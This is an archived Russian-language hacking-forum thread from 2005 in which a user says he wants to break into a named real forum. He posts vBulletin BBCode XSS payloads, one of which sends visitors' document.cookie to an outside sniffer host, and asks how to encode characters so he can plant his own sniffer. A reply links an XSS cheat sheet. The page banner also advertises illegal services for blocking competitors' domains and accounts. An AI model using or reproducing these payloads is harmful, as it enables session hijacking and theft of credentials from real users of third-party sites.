УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Проблемы с vBulletin

Опции темы

Поиск в этой теме

Опции просмотра

Проблемы с vBulletin

18.12.2005, 03:49

KP0T

Новичок

Регистрация: 13.03.2005

Сообщений: 29

Провел на форуме:
111754

Репутация: 0

Проблемы с vBulletin

Короче хочу ломануть вот этот форумчик _http://forum.polarnet.ru/

вот этот код

Код:

[HTML]http://www.wj.com]wj wj[/URL]

даёт нам что-то типа

Код:

[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj 
<FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 &quot;>wj</FONT>" 
target="_blank"&gt;http://www.wj.com]wj &lt;font face="Ar.../) 
/"&gt;wj&lt;/font&gt;</A></A>

Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа

Код:

[HTML]http://www.wj.com]wj[FONT=Arial size=+7 style=background:url(javascript:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); /]wj [/FONT][/URL]

Нехрена нам не даёт, а именно в сорцах всё смотрится так

Код:

[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' 
target=_blank>wj[FONT=Arial size=+7 
style=background:url(javascript<B></B>:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); 
/]wj [/FONT]" target="_blank"&gt;http://www.wj.com]wj[FONT=Arial...]wj 
[/FONT</A>

Вообщем ай нид хелп.

18.12.2005, 04:09

KP0T

Новичок

Регистрация: 13.03.2005

Сообщений: 29

Провел на форуме:
111754

Репутация: 0

Усё нашёл эксплойт на форуме, вот этот здесь http://www.forum.antichat.ru/threadnav11693-1-10.html

Тока теперь раскажите как шифровать эти спец символы, хочу свой снифак воткнуть.

18.12.2005, 04:25

~~Thesaurus~~

Banned

Регистрация: 03.12.2005

Сообщений: 22

Провел на форуме:
82546

Репутация: 30

http://ha.ckers.org/xss.html

V samom nizy.

18.12.2005, 05:35

KP0T

Новичок

Регистрация: 13.03.2005

Сообщений: 29

Провел на форуме:
111754

Репутация: 0

Сенкс большой

18.12.2005, 16:31

qBiN

Постоянный

Регистрация: 20.01.2005

Сообщений: 899

Провел на форуме:
1535446

Репутация: 182

Отправить сообщение для qBiN с помощью ICQ

ПРоблема решена,тему закрываю

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
перловый брутфорс md5	DetMyl	PHP	2	26.12.2005 15:52
vBulletin Version 3.0.7	Enter.beta	Уязвимости CMS / форумов	9	11.11.2005 01:57
Проблемы с Аничатовскими штучками.	temon	Болталка	4	27.09.2005 12:52

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход